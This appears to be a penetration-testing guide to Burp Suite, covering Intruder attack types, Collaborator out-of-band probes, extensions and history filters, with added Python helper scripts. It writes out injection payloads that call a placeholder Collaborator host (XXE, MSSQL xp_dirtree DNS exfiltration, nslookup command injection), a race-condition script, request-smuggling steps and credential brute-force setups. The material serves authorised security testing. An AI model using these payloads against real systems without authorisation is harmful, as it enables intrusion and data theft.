Burp Suite Pro Tips: Intruder, Extensions, and Automated Scanning
Burp Suite is the standard tool for web application security testing, but most people use only a fraction of its capabilities. This guide covers the advanced features that will make you significantly faster and more thorough — from Intruder attack type selection to the extensions that serious testers rely on.
Workspace Setup for Client Work
Burp Suite Feature Reference
| Feature | How to Use | Pro/Community | Time Saved | Use Case |
|---|---|---|---|---|
| Repeater (Ctrl+R) | Send request to Repeater, modify and resend | Both | High | Manual testing iteration |
| Intruder | Mark positions, load wordlist, attack | Both (throttled) | Very High | Fuzzing, brute force |
| Turbo Intruder | Extensions tab, send to Turbo Intruder | Both (free ext) | Very High | Race conditions, fast fuzzing |
| Collaborator | Insert Burp Collaborator URL | Pro | High | Blind SSRF, XXE, RCE detection |
| Match/Replace | Proxy settings, Match and Replace rules | Both | High | Modify all requests automatically |
| Param Miner extension | Right-click request → Extensions → Param Miner → Guess GET parameters / headers / cookies | Both (free ext) | High | Finding hidden parameters |
| Logger++ | Log all requests with grep/filter | Both (free ext) | High | Request history and analysis |
| Active Scan (Pro) | Right-click, Scan | Pro | Very High | Automated vulnerability detection |
Burp Tip: HTTP/2 Downgrade for Smuggling
Use Burp's HTTP/2 support with "Allow HTTP/2 ALPN override" (Settings → Network → HTTP) to test request smuggling against HTTP/2 front-ends that downgrade to HTTP/1.1 for the back-end. In Repeater, switch the request to HTTP/2 and send H2.TE (a Transfer-Encoding header the front-end forwards) or H2.CL (a Content-Length that does not match the body) smuggling requests; a vulnerable HTTP/1.1 back-end applies the forwarded header instead of the length the front-end derived from the HTTP/2 frame. Turn off Repeater's "Update Content-Length" option first, or Burp will silently repair the mismatch you are trying to send.
Before touching the target, configure your project properly:
- Project files — Use named project files (not temporary projects). This persists HTTP history, scanner results, and Repeater tabs across sessions. Critical for multi-day engagements.
- Scope — Add all in-scope hosts to Target scope. Enable "Use advanced scope control" to support regex patterns for complex scope definitions like .*\.example\.com. Then turn on "Intercept only in-scope items" and "Don't send out-of-scope items to history" so nothing outside the authorised hosts is touched or logged.
- Filter rules — In Proxy HTTP history, filter out noise: exclude static assets (.*\.(png|jpg|gif|ico|css|woff2)), analytics domains, and CDN hosts. This keeps history focused on application logic. The built-in MIME-type filter hides images and CSS; the regex catches assets served with a misleading Content-Type.
- Upstream proxy — For corporate environments, configure the upstream proxy under Settings → Network → Connections → Upstream proxy servers (User options → Connections in older releases) so Burp chains through the client's proxy. Check that the client's proxy does not strip or rewrite the headers you are testing.
Intruder Attack Types
Intruder is Burp's fuzzer. Choosing the wrong attack type wastes time. Here's when to use each:
Sniper
Tests one payload position at a time with a single payload list. Use this for fuzzing a single parameter — for example, testing an ID field for IDOR, or fuzzing a single POST parameter for SQLi.
Position: GET /api/users/§1337§ HTTP/1.1
Payloads: numbers 1–10000
Use case: IDOR, brute force single field
Battering Ram
Places the same payload in multiple positions simultaneously. Use this when the same value needs to appear in multiple places — like when a username appears in both the request body and a cookie.
Pitchfork
Iterates multiple payload lists in parallel, pairing position 1 payload 1 with position 2 payload 1. Use this for credential stuffing from a username:password list:
Position 1 (username): admin, user1, user2
Position 2 (password): pass1, pass2, pass3
Pairs tested: admin:pass1, user1:pass2, user2:pass3
Cluster Bomb
Tests every combination of payloads across all positions. Expensive but thorough: the request count is the product of the list sizes, so check it before starting. Use for credential brute force (every username against every password) or password spraying (a long username list against a short list of likely passwords).
Position 1 (username): admin, user1
Position 2 (password): password, 123456
Pairs tested: admin:password, admin:123456, user1:password, user1:123456
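The four attack types differ only in how Intruder walks the payload sets across the marked positions. The following script, an added example and not part of the page or of Burp, reproduces that walk for a constructed two-position login request so you can see exactly which requests each type generates and how many; the template, payload lists and helper names are all assumptions.

```python
import itertools
import re

# Constructed sample request: each § pair marks an Intruder payload position,
# with the base value (what Burp shows when you mark the request) inside the markers.
TEMPLATE = ("POST /login HTTP/1.1\r\nHost: app.example\r\n\r\n"
            "username=§admin§&password=§password§")
MARKER = re.compile("§([^§]*)§")


def base_values(template):
    """Base value of every marked position, left to right."""
    return MARKER.findall(template)


def fill(template, values):
    """Replace the marked positions, in order, with the given values."""
    it = iter(values)
    return MARKER.sub(lambda m: next(it), template)


def sniper(template, payload_sets):
    """One payload set, one position at a time; the other positions keep their base value."""
    base = base_values(template)
    for pos in range(len(base)):
        for payload in payload_sets[0]:
            values = list(base)
            values[pos] = payload
            yield fill(template, values)


def battering_ram(template, payload_sets):
    """One payload set, the same payload placed in every position at once."""
    n = len(base_values(template))
    for payload in payload_sets[0]:
        yield fill(template, [payload] * n)


def _require_one_set_per_position(template, payload_sets):
    n = len(base_values(template))
    if len(payload_sets) != n:
        raise ValueError(f"{n} positions but {len(payload_sets)} payload sets")


def pitchfork(template, payload_sets):
    """One set per position, advanced in lock-step; stops when the shortest set runs out."""
    _require_one_set_per_position(template, payload_sets)
    for combo in zip(*payload_sets):
        yield fill(template, combo)


def cluster_bomb(template, payload_sets):
    """One set per position, every combination (Cartesian product)."""
    _require_one_set_per_position(template, payload_sets)
    for combo in itertools.product(*payload_sets):
        yield fill(template, combo)


ATTACKS = {
    "sniper": sniper,
    "battering ram": battering_ram,
    "pitchfork": pitchfork,
    "cluster bomb": cluster_bomb,
}


def request_count(attack, template, payload_sets):
    """How many requests Intruder will send; the number to sanity-check before hitting Start."""
    return sum(1 for _ in ATTACKS[attack](template, payload_sets))


if __name__ == "__main__":
    users = ["admin", "user1", "user2"]
    passwords = ["pass1", "pass2", "pass3"]
    print("sniper:", request_count("sniper", TEMPLATE, [users]))                    # 2 positions x 3 = 6
    print("battering ram:", request_count("battering ram", TEMPLATE, [users]))      # 3
    print("pitchfork:", request_count("pitchfork", TEMPLATE, [users, passwords]))   # 3
    print("cluster bomb:", request_count("cluster bomb", TEMPLATE, [users, passwords]))  # 9
    for req in pitchfork(TEMPLATE, [users, passwords]):
        print(req.split("\r\n\r\n", 1)[1])
```

Run it with a bigger password list and watch the cluster bomb count explode while pitchfork stays at the length of the shorter list; that difference is the whole reason to pick the attack type deliberately.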
Collaborator for Out-of-Band Detection
Burp Collaborator is essential for detecting blind vulnerabilities: SSRF, blind XXE, blind SQL injection, blind command injection, and email header injection. Use it wherever an injected value might make the server resolve a hostname or open an outbound connection:
# SSRF test
http://<your-collaborator-subdomain>.oastify.com/test
# XXE test
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://<collaborator>.oastify.com/xxe">]>
<foo>&xxe;</foo>
# Blind SQLi DNS exfil (MSSQL; the UNC path forces a DNS lookup of the hostname)
'; exec master..xp_dirtree '\\<collaborator>.oastify.com\a';--
Open the Collaborator tab and click "Poll now" regularly while testing (or leave automatic polling on). A DNS interaction on its own confirms the server resolved your hostname even when no HTTP request follows, which is common when egress is firewalled; note the interaction's source IP and timestamp and match them against the request you sent. Use a distinct Collaborator payload per injection point so a late callback can still be attributed.
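Attributing a late or DNS-only callback to the right injection point is the part people skip. The script below is an added example, not Burp's code: it prefixes a Collaborator payload with a label naming the injection point (subdomains of the payload still resolve to Collaborator and the full queried name appears in the interaction), builds the probe payloads from this section around that hostname, and maps constructed poll results back to the point that fired. The Collaborator hostname, the injection-point names and the interaction records are all constructed.

```python
import re

# Assumed Collaborator payload: the random hostname Burp generates when you click
# "Copy to clipboard" in the Collaborator tab. This one is a constructed placeholder.
COLLAB = "abc123xyz0.oastify.com"


def oob_hostname(collab, location):
    """Prefix the Collaborator host with a DNS-safe label naming the injection point.

    Subdomains of the payload still resolve to Collaborator, and the full queried
    name shows up in the interaction, so the label tells you which probe fired.
    """
    label = re.sub(r"[^a-z0-9-]+", "-", location.lower()).strip("-")[:40]
    return f"{label}.{collab}"


def build_probes(collab, locations):
    """One payload family per injection point, each carrying that point's label."""
    probes = {}
    for loc in locations:
        host = oob_hostname(collab, loc)
        probes[loc] = {
            # URL parameters, redirects, webhooks, PDF renderers: plain HTTP
            "url": f"http://{host}/probe",
            # XML bodies: external entity fetched over HTTP
            "xxe": f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://{host}/xxe">]><foo>&xxe;</foo>',
            # MSSQL: UNC path makes the server resolve the name (DNS-only hit)
            "mssql": f"'; exec master..xp_dirtree '\\\\{host}\\a';--",
            # Blind command injection: any lookup reaches Collaborator's DNS
            "shell": f"$(nslookup {host})",
        }
    return probes


def attribute_interaction(collab, hostname):
    """Map a polled interaction's hostname back to the label it was injected with."""
    hostname = hostname.lower().rstrip(".")   # resolvers may upper-case or add a trailing dot
    if not hostname.endswith("." + collab):
        return None
    # the label sits immediately to the left of the Collaborator host
    return hostname[: -len(collab) - 1].split(".")[-1]


def triage(collab, locations, interactions):
    """Group poll results (type + hostname) by the injection point that caused them."""
    by_label = {oob_hostname(collab, loc).split(".")[0]: loc for loc in locations}
    hits = {loc: [] for loc in locations}
    for inter in interactions:
        label = attribute_interaction(collab, inter["hostname"])
        if label in by_label:
            hits[by_label[label]].append(inter["type"])
    return hits


if __name__ == "__main__":
    points = ["GET url param", "XML body", "POST note field"]
    for loc, p in build_probes(COLLAB, points).items():
        print(loc, "->", p["url"])
    # constructed sample of what "Poll now" might return
    polled = [
        {"type": "DNS", "hostname": "XML-BODY.abc123xyz0.oastify.com."},
        {"type": "HTTP", "hostname": "xml-body.abc123xyz0.oastify.com"},
        {"type": "DNS", "hostname": "post-note-field.abc123xyz0.oastify.com"},
    ]
    print(triage(COLLAB, points, polled))
```

Keep labels short and lowercase: DNS labels are limited to 63 characters, and some resolvers randomise case or append a trailing dot, which is why attribution normalises the hostname before matching.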
Essential Extensions
Active Scan++
Adds extra scanner checks the default scanner lacks, including host header attacks, Edge Side Includes, suspicious input transformations, blind code injection for several languages, and Shellshock. Install it from the BApp Store, enable it, and re-scan endpoints that the default scanner cleared.
Autorize
Replays every request you make with a second, lower-privileged Cookie or Authorization header and compares the responses; when the low-privilege replay returns the same content as your original, it flags the request as "Bypassed!", which is the signature of broken access control. Configure it with the low-privilege session's header, optionally enable the unauthenticated check too, then browse the application as the high-privilege user and let Autorize flag IDOR and privilege-escalation candidates as you go. Treat "Bypassed!" as a lead, not a finding: confirm each one in Repeater, since identical-length error pages also match.
Turbo Intruder
Drives requests from a Python (Jython) script through its own HTTP stack, sending thousands of requests per second, far faster than native Intruder. Its single-packet attack (engine=Engine.BURP2) holds back the final bytes of a batch of HTTP/2 requests and releases them in one TCP packet, so they hit the server inside the same window; that is what you want for race condition testing. Against HTTP/1.1-only targets the same gate works with Engine.THREADED (last-byte sync) but the timing is looser. The bundled race-single-packet-attack.py template, which the extension provides the RequestEngine, Engine and table names for, looks like this:
# race-single-packet-attack.py (Turbo Intruder script; RequestEngine, Engine and table are provided by the extension)
def queueRequests(target, wordlists):
    # Engine.BURP2 enables the single-packet attack over HTTP/2; use Engine.THREADED for HTTP/1.1-only targets
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)
    # 'gate' withholds the last bytes of each request until openGate releases them all at once
    for i in range(20):
        engine.queue(target.req, gate='race1')
    engine.openGate('race1')

def handleResponse(req, interesting):
    # every response lands in the Turbo Intruder results table; a negative timestamp means the server answered before the request was complete
    table.add(req)
Param Miner
Discovers hidden and unlinked parameters by guessing names from its built-in wordlist plus words harvested from the target's own responses, and detecting which ones change the response. Run "Guess GET parameters" (or headers, or cookies) on any interesting endpoint; it frequently finds debug parameters, admin flags, and deprecated parameters that aren't in the visible interface. Keep an eye on the rate limit and the cache-buster setting, since a cached response hides the diff it relies on.
GAP (Get All Parameters)
Extracts all parameter names from a target site's JavaScript and HTML to build a custom wordlist for Param Miner and Intruder fuzzing. Run it on the full site crawl output for comprehensive parameter coverage.
Bambdas: Custom HTTP History Filters
Bambdas are short Java snippets, written against the Montoya API and compiled inside Burp, that are evaluated against every HTTP history entry in real time. Switch the Proxy history filter to Bambda mode to use them; they're far more powerful than the basic filter UI. Each one must return a boolean, and requests without a response yet need the hasResponse() guard:
// Show only JSON responses whose body contains "token"
if (!requestResponse.hasResponse()) return false;
return requestResponse.response().mimeType() == MimeType.JSON
    && requestResponse.response().bodyToString().contains("token");
// Show 403 responses for paths under /admin (candidates to retest with another session)
if (!requestResponse.hasResponse()) return false;
return requestResponse.response().statusCode() == 403
    && requestResponse.request().path().startsWith("/admin");
Save Bambdas to the library for reuse across projects.
Custom Scan Profiles
The default active scan profile is noisy and slow. Create targeted profiles for specific test goals:
- SQLi-only profile — disable all checks except injection, set insertion points to parameters only
- Headers-only profile — scan HTTP headers for injection, useful for Shellshock and header-based SSRF
- Lightweight discovery profile — crawl and passive audit only, for initial scope coverage without sending attack payloads
Save custom profiles and share them across the team via Burp's configuration library export.
HTTP History Search Tricks
The HTTP history filter's search term supports regex when the "Regex" box is ticked (use the request/response checkboxes to choose what it searches). Some patterns worth saving:
# Find all requests with Authorization headers ((?m) makes ^ match at the start of each header line)
(?m)^Authorization:
# Find responses leaking internal IPs
10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(1[6-9]|2\d|3[01])\.\d+\.\d+
# Find JWT tokens in responses
eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+
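The same three patterns are worth running outside Burp, for example over an exported history or a saved response, and a JWT hit is only useful once you have looked at its header and claims. The script below is an added example, not code from the page or from Burp: it applies the patterns to a constructed response, checks that the 172.x range does not over-match, and decodes any token found without verifying it. The token is minted inside the script so the sample is realistic; the key, claims and response body are constructed.

```python
import base64
import hashlib
import hmac
import json
import re

# The same patterns as the Proxy history search (tick "Regex" in the filter dialog)
INTERNAL_IP = re.compile(
    r"\b(?:10\.\d+\.\d+\.\d+|192\.168\.\d+\.\d+|172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)\b")
JWT = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")
AUTH_HEADER = re.compile(r"(?im)^Authorization:\s*(\S+)")


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_hs256_jwt(claims: dict, key: bytes) -> str:
    """Mint a genuine HS256 token so the constructed sample below looks like a real capture."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def find_internal_ips(text: str) -> list:
    """RFC 1918 addresses leaked in a message, deduplicated."""
    return sorted(set(INTERNAL_IP.findall(text)))


def find_jwts(text: str) -> list:
    return JWT.findall(text)


def find_auth_schemes(text: str) -> list:
    """Scheme of every Authorization header (Bearer, Basic, ...), one per header line."""
    return AUTH_HEADER.findall(text)


def decode_jwt_unverified(token: str):
    """Header and claims for triage only: no signature check, never trust the output."""
    header, body, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(body))


# Constructed response: one backend IP in a header, two in the body (172.32.x.x is public, must not match)
SAMPLE_TOKEN = make_hs256_jwt({"sub": "1337", "role": "admin"}, b"constructed-demo-key")
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/json\r\n"
    "X-Backend: 10.0.4.12\r\n"
    "\r\n"
    '{"user":"alice","token":"' + SAMPLE_TOKEN + '",'
    '"services":["http://172.16.3.9:8080/api","http://172.32.1.1/public"]}'
)

if __name__ == "__main__":
    print("internal IPs:", find_internal_ips(SAMPLE_RESPONSE))
    for token in find_jwts(SAMPLE_RESPONSE):
        header, claims = decode_jwt_unverified(token)
        print("JWT alg:", header["alg"], "claims:", claims)
    print(find_auth_schemes("GET /api HTTP/1.1\r\nAuthorization: Bearer " + SAMPLE_TOKEN + "\r\n\r\n"))
```

The decoded claims tell you what to test next (a role claim to tamper with, an alg to try swapping), and the word boundaries on the IP pattern stop it matching the tail of a public address such as 210.0.4.12.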
Pair Burp's findings with the WAF Evasion Studio to craft bypass variants when the scanner gets blocked, and use Encoding Pipeline to transform payloads before replaying them in Repeater.